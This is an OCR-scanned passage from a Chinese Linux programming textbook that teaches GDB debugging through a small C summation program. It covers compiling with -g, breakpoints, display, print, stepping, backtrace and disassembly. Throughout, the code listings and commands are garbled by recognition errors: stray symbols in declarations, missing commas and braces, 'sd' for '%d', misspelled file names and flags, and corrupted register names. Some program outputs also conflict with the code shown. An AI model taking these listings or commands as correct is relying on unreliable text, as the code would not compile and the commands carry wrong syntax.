要 使 用 GDB 进行 调试 ， 在 编译 程序 的 时 候 需 要 加 入 -g 选项 。 例 如 编译 如 下 代码 。 


01 /* 文 件 名 : gdb-01.c*/ 

02 #include <stdio.h>/* 用 于 printf*/ 
03 #include <stdlib.h>/* 用 于 malloc*/ 
04 /* 声明 函数 sum () 为 static int 类 型 */ 
05 static int sum(int value) 

06 /* 用 于 控制 输入 输出 的 结构 */ 


07 struct inout{ 


08 int value; 

09 int result; 

EO 

11 int main(int argc, char *argv[]){ 

12 

13 struct inout *#io = (struct inout*)malloc(sizeof(struct inout)); 
/* 申 请 内 存 */ 

14 

15 if (NULL == io) /* 判 断 是 否 成 功 */ 

16 { 

17 printf ("申请 内 存 失败 \n"); /* 打 印 失 败 信息 */ 

18 return -1; /* 返 回 -1*/ 

19 

20 

2 if(argc !=2) /* 判 断 输入 参数 是 否 正 确 */ 

22 { 

2 printf ("参数 输入 错误 !\n") ; /* 打 印 失败 信息 */ 

24 return -1; /* 返 回 -1*/ 

25 } 

26 

27 io->value = *argv[1]-'0'; /* 获得 输入 的 参数 */ 

28 io->result = sum(io->value); /* 对 value 进 行 累加 求 和 */ 

29 printf ("你 输入 的 值 为 : sd, 计算 结果 为 : sd\n", io->valueio->result) ; 

30 return 0; 

E> 


32 ”/* 累加 求 和 函数 */ 


33 static int sum(int value) { 
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34 int result = 0; 

3 nt 1 = OF 

36 

37 for (i=0;i<value;i++) /* 循环 计算 累加 值 */ 
38 result += i; 

39 

40 return result; /* 返 回 结 果 */ 

41 } 


上 面 的 代码 实现 了 一 个 累加 求 和 ， 例 如 对 sum 输入 3， 其 结果 应 该 是 6=1+2+3。 编 译 
代码 如 下 : 


$gcc -o test gdqdb-01.c -9 
生成 了 test 的 可 执行 文件 。 运 行 此 程序 : 


$./test 3 
你 输入 的 值 为 : 3, 计算 结果 为 : 3 


GDB 之 所 以 能 够 调试 程序 在 于 进行 编译 时 的 -g 选项 , 当 设 置 了 这 个 选项 的 时 候 , GCC 
会 向 程序 中 加 入 “ 棉 子 ”，GDB 能 够 利用 这 些 棉 子 与 程序 交互 。 


2.4.2 使 用 GDB 调试 程序 


在 2.4.1 节 中 ， 将 源 文件 gdb-01.c 编译 成 目标 文件 test。 在 编译 的 时 候 加 入 了 -g 选项 ， 
可 以 使 用 GDB 对 可 执行 文件 test 进行 调试 。 下 面 利 用 GDB 调试 test， 查 找 test 计算 错误 
的 原因 。 


1. 加 载 程 序 


使 用 GDB 加 载 程序 的 时 候 ,需要 先 将 程序 加 载 到 GDB 中 。 加 载 程序 的 命令 格式 为 “gdb 
要 调试 的 文件 名 ” 例如， 下 面 的 命令 将 可 执行 文件 test 加 载 到 GDB 中 。 


$gdb test (gdb 命令 + 调试 的 可 执行 文件 ) 

GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 

Copyright (C) 2012 Free Software Foundation, Inc. 

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/ 
gpl.html> 

This is free software: you are free to change and redistribute it. 

There is NO WARRANTY, to the extent permitted by law. Type "show copying" 
and "show warranty" for details. 

This GDB was configured as "i686-linux-gnu". 

For bug reporting instructions, please see: 
<http://bugs.launchpad.net/gdb-linaro/>... 

Reading symbols from /home/linux-c/Linux net/02/2.4.1/test...done. 

(gdb) (等 待 输 入 调试 命令 ) 


2. 设置 输入 参数 


通常 可 执行 文件 在 运行 的 时 候 需要 输入 参数 , GDB 中 向 可 执行 文件 输入 参数 的 命令 格 
式 为 “set args 参数 值 1 参数 值 2 ...”。 例 如 ， 下 面 的 命令 set args 3 表示 向 可 执行 文件 输 
入 的 参数 设 为 3， 即 传 给 test 程序 的 值 为 3。 


。49 。 


第 1 篇 Linux 网 络 开发 基础 


(gdb) set args 3 
(gdqb) 


3. 打印 代码 内 容 


命令 list 


(设置 参数 args 为 3) 


于 列 出 可 执行 文件 对 应 源 文件 的 代码 ， 命 令 格 式 为 “list 开始 的 行 号 ”。 例 


如 ， 下 面 的 命令 list 1， 从 第 一 行 开始 列 出 代码 ， 每 次 按 Enter 键 后 顺序 向 下 列 出 代码 。 


(gdb) list 1 

1 /* 文 件 名 : gdb-01.c*/ 

2 #include <stdio.h>/* 用 于 printf*/ 

3  #include <stqlib.h>/* 用 于 malloc*/ 

4 ”/* 声明 函数 sum() 为 static int 类 型 */ 

5 static int sum(int value); 

6 “/* 用 于 控制 输入 输出 的 结构 */ 

灯 struct inout{ 

8 int value; 

9 int result; 

10 5; 

(gdb) ( 按 下 Enter 键 ) 

11 int main(int argc, char *argv[]){ 

二 

3 struct inout *io = (struct inout*)malloc(sizeof (struct inout)); 
/* 申 请 内 存 */ 

14 

15 if (NULL == io) /* 判 断 是 否 成 功 */ 

16 { 

17 printf ("申请 内 存 失 败 \n"); /* 打 印 失败 信息 */ 

18 return -1; /* 返 回 -1*/ 

19 } 

20 

(gdb) 〈 按 下 Enter 键 ) 

2 if(argc !=2) /x* 判 断 输入 参数 是 否 正确 */ 

Cle { 

23 printf ("参数 输入 错误 ! \n"); /* 打 印 失 败 信 息 */ 

24 return -1; /* 返 回 -1*/ 

25 

26 

27 io->value = *argv[1]-'0'; /* 获得 输入 的 参数 */ 

28 io->result = sum(io->value) ; /* 对 value 进行 累加 求 和 */ 

29 printf ("你 输入 的 值 为 : sd, 计算 结果 为 : sd\n", io->valueio->result) ; 

30 return 0; 

(gdb) ( 按 下 Enter 键 ) 

cs 

32 /* 累加 求 和 函数 */ 

33 static int sum(int value){ 

34 int result = 0; 

区 二] int i = 0; 

36 

37 for (i=0;i<value;i++) /* 循环 计算 累加 值 */ 

38 result += i; 

39 

40 return result; /* 返 回 结 果 */ 


(gdb) ( 按 下 Enter 键 ) 


41 


} 


(gdb) ( 按 下 Enter 键 ) 
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Line number 42 out of range; gdb-l.c has 41 lines. 
(gdb) 


4. 设置 断 点 
b 命令 在 某 一 行 设置 断 点 ， 程 序 运 行 到 断 点 的 位 置 会 中 断 ， 等 待 用 户 的 下 一 步 操 作 
指令 


Co 


(gdb) b 38 
Breakpoint 1 at 0x8048502: file gdb-l.c, line 38. 
(gdb) 


5. 运行 程序 
GDB 在 默认 情况 下 是 不 会 让 可 执行 文件 运行 的 ， 此 时 ,程序 并 没有 真正 运行 起 来 ， 只 
是 装载 进 了 GDB 中 。 要 使 程序 运行 需要 输入 run 命令 。 


(gdb) run 3 
Starting program: /home/linux-c/Linux net/02/2.4.1/test 3 


Breakpoint 1, sum (value=3) at gdb-1.c:38 
38 result += i; (此 处 遇 到 断 点 ) 
(gdb) 


6. 显示 变量 


在 程序 运行 到 第 4 步 所 设置 的 38 行 断 点 的 时 候 ， 程 序 会 中 断 运行 等 待 进一步 的 指令 。 
这 时 可 以 进行 一 系列 的 操作 ， 其 中 ， 命 令 display 可 以 显示 变量 的 值 。 


(gdb) display 工 ( 每 次 停止 时 显示 变量 i 的 值 ) 

Le m0 

(gdb) display result (每 次 停止 时 显示 变量 result 的 值 ) 
2: result = 0 

(gdb) c (继续 运行 ) 

Continuing . 


Breakpoint 1, sum (value=3) at gdb-1.c:38 
38 result += i; 

2: result = 0 

rH 

(gdb) c (继续 运行 ) 

Continuing. 


Breakpoint 1, sum (value=3) at gdb-1.c:38 
38 result += i; 

Zresult = 

下 SS 人 

(gdb) (继续 运行 ) 

Continuing. 

你 输入 的 值 为 ，3, 计算 结果 为 : 3 

[Inferior 1 (process 9520) exited normally] 
(gdb) 


通过 上 面 的 跟踪 ， 已 经 可 以 判断 出 问题 出 在 for(i=0;i<value;i++); 此 行 代码 上 ， 可 以 将 
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其 修改 为 for(i=1;i<=value;it+)， 或 者 修改 result+=i 为 result+=(i+1)。 


7. 修改 变量 的 值 
要 在 GDB 中 修改 变量 的 值 ， 使 用 set 命令 。 


(gdb) set result=6 (修改 result 值 为 6) 
(gdb) c (继续 运行 ) 
Continuing. 


你 输入 的 值 为 : 3, 计算 结果 为 : 12 


[Inferior 1 (process 9563) exited normally] 


8. 退出 GDB 
在 调试 完 程序 后 ， 使 用 q 命令 退出 GDB。 
ea q (退出 ) 


2.4.3 GDB 常用 命令 


令 。 


在 2.2 节 中 举 了 一 个 简单 的 例子 来 演示 DBG 的 使 用 ， 本 节 将 详细 介绍 GDB 的 常用 命 
参见 表 2.8， 主 要 包含 信息 获取 、 断 点 设置 、 运 行 控制 、 程 序 加 载 等 常用 命令 ， 这 些 


函数 可 以 进行 调试 时 的 程序 控制 、 程 序 的 参数 设置 等 。 


表 2.8 GDB 常用 命令 表 表 


GDB 的 命令 格 式 窜 :- 必 简写 
list list [开始 ,结束 ] 列 出 文件 的 代码 清单 1 
print printf p 打印 变量 内 容 p 
break break [ 行 号 | 函数 名 称 ] 设置 断 点 b 
continue continue [开始 ,结束 ] 继续 运行 c 
info info para 列 出 信息 i 
next next 下 一 行 n 
step step 进入 函数 S 
display display para 显示 参数 
file file path 加 载 文件 
run run args 运行 程序 r 


1. 执行 程序 


GDB 执行 程序 可 以 使 用 gdb program 的 方式 ，program 是 程序 的 程序 名 。 当 然 ， 此 


程序 编译 的 时 候 要 使 用 -g 选项 。 假 如 在 启动 GDB 的 时 候 没 有 选择 程序 名 称 ， 可 以 在 GDB 
启动 后 使 用 file program 的 方法 启动 。 例 如 : 


(gdb) file test 


如 果 要 运行 准备 好 的 程序 ， 可 以 使 用 run 命令 ,在 它 后 面 是 传递 给 程序 的 参数 ,例如 : 
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(gdb)run 3 
你 输入 的 值 为 : 3, 计算 结果 为 : 6 


[Inferior 1 (process 9577) exited normally] 

如 果 使 用 不 带 参数 的 run 命令 ，GDB 就 再 次 使 用 前 一 条 run 命令 的 参数 。 

2. 参数 设置 和 显示 

使 用 set args 命令 来 设置 发 送 给 程序 的 参数 ， 使 用 show args 命令 就 可 以 查看 其 默认 的 


(gdb) set args 3 
(gdb) show args 
Argument list to give program being debugged when it is started is "3". 


(gdb) ( 按 下 Enter 键 ) 

Argument list to give program being debugged when it is started is "3". 
如 果 按 Enter 键 ，GDB 默认 执行 上 一 个 命令 。 例如 上 面 的 例子 中 在 执行 命令 show args 
按 Enter 键 会 接着 执行 show args 命令 。 


3. 列 文件 清单 
打印 文件 代码 的 命令 是 list， 简 写 为 1。list 的 命令 格式 为 : 


list linel,line2 


打印 出 从 linel 到 line2 之 间 的 代码 。 如 果 不 输入 参数 ， 则 从 当前 行 开始 打印 。 例 如 ， 
打印 出 从 第 2 行 到 第 5 行 之 间 的 代码 : 

(GDJNLE2 

2 #include <stdio.h>/* 用 于 printf*/ 

3  #include <stqdlib.h>/* 用 于 malloc*/ 

4 ”/* 声明 函数 sum() 为 static int 类 型 */ 


5 static int sum(int value) 
(gdb) 


后 


4. 打印 数据 

打印 变量 或 者 表达 式 的 值 可 以 使 用 print 命令 ,简写 为 p。 它 是 一 个 功能 很 强 的 命令 ， 
可 以 打印 任何 有 效 表达 式 的 值 。 除 了 可 以 打印 程序 中 的 变量 值 之 外 ， 还 可 以 打印 其 他 合法 
的 表达 式 。print 的 使 用 方式 为 : 


(gdb)print var (var 为 参数 ) 
口 print 命 令 可 以 打印 常量 表达 式 的 值 ， 例 如 ， 打 印 2+3 的 结果 : 
(gdb) p 2+3 

$7= 5 


口 print 命令 可 以 计算 函数 调用 的 返回 值 ， 例 如 ， 打 印 调用 函数 sumO 对 3 求 和 : 


(gdb) P sum(3) 
$8 = 6 
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口 打印 一 个 结构 中 各 个 成 员 的 值 ， 例 如 打印 上 面 代码 中 的 io 结构 中 各 个 成 员 的 值 : 


(gdb) P *io 
$9 = {value = 3, result = 6} 


口 GDB 的 系统 中 ， 之 前 打印 的 历史 值 保存 在 全 局 变量 中 。 如 $9 中 保存 了 结构 io 的 
值 ， 用 print 可 以 打印 历史 值 ， 例 如 : 


(gdb) p $9 
$3 = {value = 3, result = 6} 


口 利用 print 命令 可 以 打印 构造 数组 的 值 ， 给 出 数组 的 指针 头 并 且 设 定 要 打印 的 结构 
数量 ，print 命令 会 依次 打印 各 值 。 打 印 构造 数组 的 格式 为 : 

基地 址 6 个 数 

例如 ，*io 是 结构 ioout 的 头 ， 要 打印 从 io 开始 的 两 个 数据 结构 (当然 最 后 一 个 是 非法 

这 里 只 是 举 一 个 例子 )。 


(gdb) p *io@2 
$13 = {{value = 3, result = 6}, {value = 0, result = 135153}} 


5. 断 点 
设置 断 点 的 命令 是 break， 简 写 为 bp。 有 如 下 3 种 形式 ， 注 意 GDB 的 停止 位 置 都 是 在 
程序 之 前 。 


口 break 行 号 : 程序 停止 在 设 定 的 行 之 前 ; 

口 break 函数 名 称 : 程序 停止 在 设 定 的 函数 之 前 ; 

口 break 行 号 或 者 函数 让 条 件 : 这 是 一 个 条 件 断 点 设置 命令 ， 如 果 条 件 为 真 ， 则 程序 
在 到 达 指 定 行 或 函数 时 停止 。 

(1) 设置 断 点 。 如 果 程 序 由 很 多 的 文件 构成 ， 在 设置 断 点 时 要 指定 文件 名 。 例 如 : 

(gdb) b gdb-01.c:38 (在 文件 gdb-01.c 的 第 38 行 设 置 断 点 ) 

Note: breakpoint 4 also set at pc 0x804849c . 

Breakpoint 5 at 0x804849c: file gdb-01.c, line 38. 


(gdb) b gdb-01.c:sum (在 文件 gdb-01.c 的 函数 sum 处 设置 断 点 ) 
Breakpoint 6 at 0x8048485: file gdqb-01.c，1line 28. 


要 设置 一 个 条 件 断 点 ， 可 以 利用 break 让 命令 ， 在 调试 循环 代码 段 时 这 样 的 设置 比较 


机 


里 ， 省 略 了 大 段 的 手动 调试 。 例 如 , 在 sum() 函 数 中 , 当 i 为 2 时 要 设置 断 点 ， 如 下 所 示 。 


(gdb) b 38 if i==2 

Breakpoint 8 at 0x804849c: file gdb-01.c，1line 38. 
(gdb) run 

The program being debugged has been started already. 
Start it from the beginning? (y or n) y 


Starting program: /home/linux-c/Linux net/02/2.4.1/test 3 


Breakpoint 3, sum (value=3) at gdb-01.c:38 
38 result += i; 


(2) 显示 当前 GDB 的 断 点 信息 。 使 用 info break 命令 显示 当前 断 点 的 信息 ,例如 ， 列 
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出 当前 的 断 点 信息 : 
(gdb) info break 
Num Type Disp Enb Address What 
2 breakpoint keep y 0x080484bc in main at gdb-01.c:29 
区 breakpoint keep y 0x08048502 in sum at gdb-01.c:38 


stop only if i=2 
breakpoint already hit 1 time 
信息 分 为 6 类 : Num 是 断 点 的 编号 ，Type 是 信息 的 类 型 ，Disp 是 描述 ，Enb 是 断 点 是 
否 有 效 ，Address 是 断 点 在 内 存 中 的 地 址 ，What 是 对 断 点 在 源 文件 中 位 置 的 描述 。 
第 3 个 断 点 的 停止 条 件 为 当 i==2 时 ， 已 经 命中 了 1 次 。 
(3) 删除 指定 的 某 个 断 点 。 删 除 某 个 指定 的 断 点 使 用 命令 delete， 命 令 格式 为 “delete 
breakpoint 断 点 编号 ”。 例 如， 下 面 的 命令 delete b 3 会 删除 第 3 个 断 点 。 


(gdb) delete breakpoints 3 


(gdb) info b 

Num Type Disp Enb Address What 

breakpoint keep y 0x080484bc in main at gdb-01.c:29 

上 面 的 命令 会 删除 断 点 的 编号 为 3 的 断 点 。 如 果 不 带 编号 参数 ， 将 删除 所 有 的 断 点 。 


(4) 禁止 断 点 。 禁 止 某 个 断 点 使 用 命令 disable， 将 某 个 断 点 禁止 后 ，GDB 进行 调试 的 
时 候 ， 在 断 点 处 程序 不 再 中 断 。 命 令 的 格式 为 “disable breakpoint 断 点 编号 ” 例如 ， 下 面 
的 命令 disable breakpoint 2， 将 禁止 使 用 断 点 2， 即 程序 运行 到 断 点 2 的 时 候 此 程序 不 会 停 
止 ， 同 时 断 点 信息 的 使 能 域 将 变 为 n。 


(gdb) disable b 2 


(5) 允许 断 点 。 允 许 某 个 断 点 使 用 命令 enable, 这 个 命令 将 禁止 的 断 点 重新 启用 , GDB 
会 在 启用 的 断 点 处 重新 中 断 。 命 令 的 格式 为 “enable breakpoint 断 点 编号 ” 例如 ， 下 面 的 
命令 enable breakpoint 2， 将 允许 使 用 断 点 2， 即 程序 运行 到 断 点 2 的 时 候 此 程序 会 停止 ， 
同时 断 点 信息 的 使 能 域 将 变 为 y。 

(gdb) enable b 2 


(6) 清除 断 点 。 一 次 性 地 清除 某 行 处 的 所 有 断 点 使 用 命令 clear， 这 个 命令 将 清除 某 行 
的 所 有 断 点 信息 。 将 某 行 的 断 点 清除 后 ，GDB 将 不 再 保存 这 些 信息 ， 此 时 不 能 使 用 enable 
命令 重新 允许 断 点 生效 。 如 果 想 重新 在 某 行 处 设置 断 点 ， 则 必须 重新 使 用 命令 breakpoint 
进行 设置 。 命 令 的 格式 为 “clear 源 代码 行 号 ”。 例 如， 下 面 的 命令 clear 29， 将 清除 在 源 代 
码 文件 中 第 29 行 所 设置 的 断 点 。 

(gdb) clear 29 


6. 变量 类 型 检测 


在 调试 过 程 中 有 需要 查看 变量 类 型 的 情况 ， 此 类 命令 有 whatis、ptype 等 。 

口 打印 数组 或 者 变量 的 类 型 whatis: 要 查看 程序 中 某 个 变量 的 类 型 ， 可 以 使 用 命令 
wahtis。whatis 命令 的 格式 为 “whatis 变量 名 ”， 其 中 的 变量 名 是 要 查看 的 变量 。 
例如 查看 io 和 argc 的 变量 类 型 ，io 为 struct inout 类 型 ，argc 为 int 类 型 。 
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(gdb) whatis *io 
type = struct inout 
(gdb) whatis argc 
type = int 


口 结构 的 详细 定义 ptype: 使 用 whatis 命令 查看 变量 的 类 型 时 ， 只 能 获得 变量 的 类 型 
名 称 ， 不 能 得 到 类 型 的 详细 信息 。 如 果 想 要 查看 变量 的 详细 信息 ， 需 要 使 用 命令 
ptype。 例 如 查看 io 的 类 型 ， 最 后 的 * 表 明 io 是 一 个 指向 struct inout 类 型 的 指针 。 

(gdb) ptype io 

type = struct inout { 
int value; 


int result; 


}* 


7. 单 步 调试 
在 调试 程序 的 时 候 经 常 遇 到 要 单 步 跟踪 的 情况 ， 并 在 适当 的 时 候 进 入 函数 体 的 内 部 继 


续 跟 踪 。GDB 的 next 命令 和 step 命令 提供 了 这 种 功能 。next 命令 是 单 步 跟踪 的 命令 ， 简 
写 为 n; step 是 可 以 进入 函数 体 的 命令 ,简写 为 s。 如 果 已 经 进入 某 个 函数 ， 想 退出 函数 的 


运行 


序 ， 


， 返 回 到 调用 的 函数 中 ， 要 使 用 命令 finish。 例 如 在 代码 的 第 28 行 设置 断 点 ， 跟 踪 程 
在 第 34 行进 入 sum0) 函 数 的 内 部 继续 跟踪 。 
(gdb) b 28 (在 28 行 处 设置 断 点 ) 
Breakpoint 5 at 0x80484a7: file gdb-01l.c, line 28. 
(gdb) run 3 (运行 程序 ,输入 参数 为 3) 
Starting program: /home/linux-c/Linux net/02/2.4.1/test 3 

(在 28 行 断 点 处 停 下 ) 
Breakpoint 5, main (argc=2, argv=0xbffff244) at gdb-01.c:28 
28 io->result = sum(io->value); /* 对 value 进行 累加 求 和 */ 
(gdb) s (进入 函数 体 sum 内 部 ) 
sum (value=3) at gdb-01.c:34 
34 int result = 0; 
(gdb) n ( 单 步 执 行 ) 
35 int i = 0; 
(gdb) n ( 单 步 执行 ) 
37 for (i=0;i<=value; i++) /* 循 环 计算 累加 值 */ 
(gdb) finish (执行 完 函 数 sum) 


Run till exit from #0 sum (value=3) at gdb-01.c:37 
0x080484b5 in main (argc=2, argv=0xbffff244) at gdb-01.c:28 


28 io->result = sum(io->value); /* 对 value 进行 累加 求 和 */ 

Value returned is $9 = 6 (函数 sum 执行 完毕 ,结果 为 6) 

(gdb) n ( 单 步 执行 ) 

29 printf ("你 输入 的 值 为 : sd, 计算 结果 为 : $d\n", io->value io->result) ; 
(gdb) c (继续 执行 到 程序 结束 或 者 下 一 个 断 点 ) 
Continuing. 


你 输入 的 值 为 :3, 计算 结果 为 : 6 
[Inferior 1 (process 9772) exited normally] 
(gdb) 


8. 设置 监测 点 
命令 display 可 以 显示 某 个 变量 的 值 , 在 结束 或 者 遇 到 断 点 的 时 候 , 将 设置 变量 的 值 显 


。56 。 


第 2 章 Linux 编程 环境 


示 出 来 。 当 然 是 否 显示 还 要 看 变量 的 作用 域 ，display 只 显示 作用 域内 变量 的 值 。 例如， 将 
io 和 sum 中 的 result 设置 为 显示 ， 设 置 断 点 在 第 27 行 、 第 29 行 和 第 38 行 ， 进 行 调试 的 情 
况 如 下 : 


$ gdb test (运行 6DB, 加 载 程 序 test) 
linux-c@linuxc-virtual-machine:~/Linux net/02/2.4.1$ gdb test 

GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 

Copyright (C) 2012 Free Software Foundation, Inc. 

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/ 
gpl.html> 

This is free software: you are free to change and redistribute it. 

There is NO WARRANTY, to the extent permitted by law. Type "show copying" 
and "show warranty" for details. 

This GDB was configured as "i686-linux-gnu". 

For bug reporting instructions, please see: 
<http://bugs.launchpad.net/gdb-linaro/>... 

Reading symbols from /home/linux-c/Linux net/02/2.4.1/test...done. 


(gdb) b 27 (在 第 27 行 设置 断 点 ) 

Breakpoint 1 at 0x8048490: file gdb-01.c, line 27. 

(gdb) b 29 (在 第 29 行 设置 断 点 ) 

Breakpoint 2 at 0x80484bc: file gdb-01l.c, line 29. 

(gdb) b 38 (在 第 38 行 设置 断 点 ) 

Breakpoint 3 at 0x8048502: file gdb-01l.c, line 38. 

(gdb) run 3 (运行 程序 test, 输入 参数 3, 将 在 第 27 行 断 点 处 停 下 ) 


Starting program: /home/linux-c/Linux net/02/2.4.1/test 3 


Breakpoint 1, main (argc=2, argv=0xbffff244) at gdb-01.c:27 


27 io->value = *argv[1]-'0'; /* 获得 输入 的 参数 */ 

(gdb) display *io (设置 显示 参数 *io) 

1: *io = {value = 0, result = 0} (显示 当前 值 ) 

(gdb) c (继续 运行 ,将 在 第 46 行 断 点 处 停 下 ) 
Continuing. 


Breakpoint 3, sum (value=3) at gdb-01.c:38 


38 result += i; (在 第 38 行 断 点 处 停 下 ) 

(gdb) display result (设置 显示 参数 result) 

2: result = 0 

(gdb) n ( 单 步 执 行 , 到 下 一 行 停 下 , 并 显示 result 的 值 ) 
37 for (i=0;i<=value; i++) /* 循环 计算 累加 值 */ 

2: result = 0 (当前 值 为 0) 

(gdb) c (继续 执行 , 到 第 38 行 断 点 处 停 下 ) 
Continuing. 


Breakpoint 3, sum (value=3) at gdb-01.c:38 


38 result += i; 

2: result = 0 (result 当前 值 为 0) 

(gdb) c (继续 执行 , 到 第 38 行 断 点 处 停 下 ) 
Continuing. 


Breakpoint 3, sum (value=3) at gdb-01.c:38 


38 result += i; 

2: result = 1 (result 当前 值 为 1) 

(gdb) c (继续 执行 ,到 第 38 行 断 点 处 停 下 ) 
Continuing. 


Breakpoint 3, sum (value=3) at gdb-01.c:38 
38 result += i; 
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2: result = 3 (result 当前 值 为 3) 
(gdb) c (继续 执行 ,到 第 29 行 断 点 处 停 下 ) 
Continuing. 


Breakpoint 2, main (argc=2, argv=0xbffff244) at gdb-01.c:29 


29 printf ("你 输入 的 值 为 : sd, 计算 结果 为 : $d\n",io->value,io->result); 
1: *io = {value = 3; result = 6} (在 此 处 *io 在 其 作用 域 , 显示 *io 的 当前 值 ) 
(gdb) c (继续 执行 ) 

Continuing. 


你 输入 的 值 为 ， 3, 计算 结果 为 : 6 
[Inferior 1 (process 9810) exited normally] 
(gdb) 


9. 调用 路 径 


backtrace 命令 可 以 打印 函数 的 调用 路 径 ， 提 供 向 前 跟踪 功能 ， 此 命令 对 跟踪 函数 很 有 
用 处 。backtrace 命令 打印 一 个 顺序 列表 ， 函 数 从 最 近 到 最 远 的 调用 过 程 ， 包 含 调用 函数 和 
其 中 的 参数 。 其 简写 为 bt。 例 如 在 第 38 行 设置 断 点 后 打印 调用 过 程 : 

(gdb) bt 


#0 sum (value=3) at gdb-01.c:38 
#1 0x080484b5 in main (argc=2, argv=0xbffff244) at gdb-01.c:28 


10. 信息 info 
info 命令 可 以 获得 当前 命令 的 信息 ， 例 如 获得 断 点 的 情况 ， 参 数 的 设置 情况 等 。 
11. 多 线程 thread 


多 线程 是 现代 程序 中 经 常 采 用 的 编程 方法 ， 而 多 线程 由 于 执行 过 程 中 的 调度 随机 性 ， 
不 好 调试 。 多 线程 调试 主要 有 两 点 : 先 获 得 线程 的 ID 号 ， 然 后 转 到 该 线程 进行 调试 。 

info thread 命令 列 出 当前 进程 中 的 线程 号 ， 其 中 最 前 面 的 为 调试 用 的 ID。 

用 thread id 进入 需要 调试 的 线程 。 


12. 汇编 disassemble 


disassamble 命令 打印 指定 函数 的 汇编 代码 ， 例 如 sum 的 汇编 代码 如 下 : 


(gdb) disassemble sum 

Dump of assembler code for function sum: 
0x080484e5 <+0>: push sebp 
0x080484e6 <+1>: mov Sesp, Sebp 
0x080484e8 <+3>: sub $0x10, Sesp 
0x080484eb <+6>: movl $0x0,-0x8 (sebp) 


0x080484f2 <+13>: movl $0x0,-0x4(%ebp) 
0x080484f9 <+20>: movl $0x0,-0x4(%ebp) 
0x08048500 <+27>: jmp 0x804850c <sum+39> 
=> 0x08048502 <+29>: mov —0x4 (Sebp), Seax 
0x08048505 <+32>: add Seax, -0x8 (Sebp) 
0x08048508 <+35>: addl $0xl1,-0x4(%ebp) 
0x0804850c <+39>: mov -0x4 (Sebp) ,Seax 
0x0804850f <+42>: cmp 0x8 (Sebp) ,Seax 
0x08048512 <+45>: le 0x8048502 <sum+29> 
0x08048514 <+47>: mov -0x8 (Sebp) ,Seax 
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0x08048517 <+50>: leave 


0x08048518 <+51>: ret 
End of assembler dump. 


13. GDB 的 帮助 信息 
在 使 用 本 例 时 , 读者 可 能 会 遇 到 一 些 困扰 , 例如 命令 c 是 什么 意思 , display 是 什么 等 。 
这 些 在 GDB 中 可 以 利用 help 命令 来 获得 帮助 。 例 如 : 


(gdb) help 
List of classes of commands: 


aliases -- Aliases of other commands 

breakpoints -- Making program stop at certain points 
data -- Examining data 

files -- Specifying and examining files 

internals -- Maintenance commands 

Obscure -- Obscure features 

running -- Running the program 

stack -- Examining the stack 

status -- Status inquiries 

support -- Support facilities 

tracepoints -- Tracing of program execution without stopping the program 
user-defined -- User-defined commands 


Type "help" followed by a class name for a list of commands in that class. 

Type "help all" for the list of all commands. 

Type "help" followed by command name for full documentation. 

Type "apropos word" to search for commands related to "word". 

Command name abbreviations are allowed if unambiguous. 

(gdb) 

help 命令 罗列 了 GDB 支持 的 命令 ,例如 断 点 (breakpoints)、 环 境 数据 (data) 等 。 对 
命令 c 等 的 疑问 可 以 使 用 命令 help 获得 解释 : 

(gdb) help c 

Continue program being debugged, after signal or breakpoint. 

If proceeding from breakpoint, a number N may be used as an argument, 


which means to set the ignore count of that breakpoint to N - 1 (so that 
the breakpoint won't break until the Nth time it is reached). 


If non-stop mode is enabled, continue only the current thread, 
otherwise all the threads in the program are continued. To 


continue all stopped threads in non-stop mode, use the -a option. 
Specifying -a and an ignore count simultaneously is an error. 


help 解释 c 命令 用 于 继续 执行 程序 , 并 且 可 以 设置 执行 的 行 数 。 其 实 c 命令 是 continue 
的 简写 。 


2.4.4 其 他 的 GDB 


除了 基于 命令 行 的 GDB 调试 程序 ， 在 Linux 下 还 有 很 多 其 他 基于 GDB 的 程序 ， 例 如 
xxgdb、insight 等 。 


1. xxgdb 
xxgdb 对 命令 行 的 GDB 进行 了 简单 的 包装 ， 将 GDB 的 输入 、 命 令 、 输 出 分 为 了 儿 个 
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窗口 ， 并 且 将 命令 用 多 个 按钮 表示 ， 方 便 使 用 。 


2. 


Emacs 


Emacs 集成 了 GDB 的 调试 。 可 以 用 下 面 的 命令 启动 GDB。 


M-x gdb 


在 Emacs 中 有 一 种 多 窗口 调试 模式 (gdb-many-windows)， 可 以 把 窗口 划分 为 5 个 窗 
格 ， 同 时 显示 gdb 命令 窗口 、 当 前 局 部 变量 、 程 序 文本 、 调 用 栈 和 断 点 。 

Emacs 对 gdb 的 命令 和 快捷 键 做 了 绑 定 。 对 于 常用 的 命令 ， 输 入 快捷 键 比较 方便 。 例 
如 ，CtrlHC 和 Ctrl+N 是 next line，Ctrl+C 和 Ctrl+S 是 step in， 在 调试 过 程 中 用 得 最 多 的 快 
捷 键 就 是 这 两 个 。 


25. 让 结 


本 章 介绍 了 在 Linux 环境 下 进行 编程 的 基本 知识 ， 包 括 Vi 编辑 器 、GCC 编译 器 、 
Makefile 的 编写 、 使 用 GDB 进行 程序 调试 。 


口 


口 
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Vi 编辑 器 是 Linux 环境 下 进行 开发 最 常用 的 编辑 器 ， 它 的 功能 非常 强大 ， 本 章 介 
绍 了 Vim 的 使 用 方法 。 

GCC 编译 器 是 进行 编程 时 所 必须 了 解 的 工具 , 本章 中 仅仅 对 GCC 的 冰山 一 角 进行 
了 揭示 ， 介 绍 了 使 用 GCC 进行 程序 编译 的 简单 方法 。 

GDB 是 Linux 下 进行 程序 调试 的 不 二 首选 ， 并 且 现在 有 了 很 多 图 形 的 客户 端 ， 使 
用 起 来 更 加 方便 。 有 一 些 开发 环境 集成 了 GDB 的 调试 环境 。 

Makefile 是 进行 程序 编译 时 经 常 使 用 的 编译 配置 文件 ， 本 章 对 Makefile 进行 了 
介绍 。 


:在 进行 比较 大 的 工程 构建 的 时 候 ， 经 常会 用 到 libtools 工具 。 在 这 套 工 具 的 帮助 


下 ， 进 行 一 些 修改 就 可 以 构建 自己 的 环境 无 关 项 目 。 目 前 大 多 数 项 目 都 是 采用 此 
工具 构建 的 。 与 libtools 相 比 较 ， 新 出 现 的 CMake 有 更 大 的 优势 。 不 论 从 速度 还 
是 可 读 性 上 ， 比 libtools 要 好 很 多 。 例如 KDE 采用 了 CMake 工具 进行 构建 项 目 。 
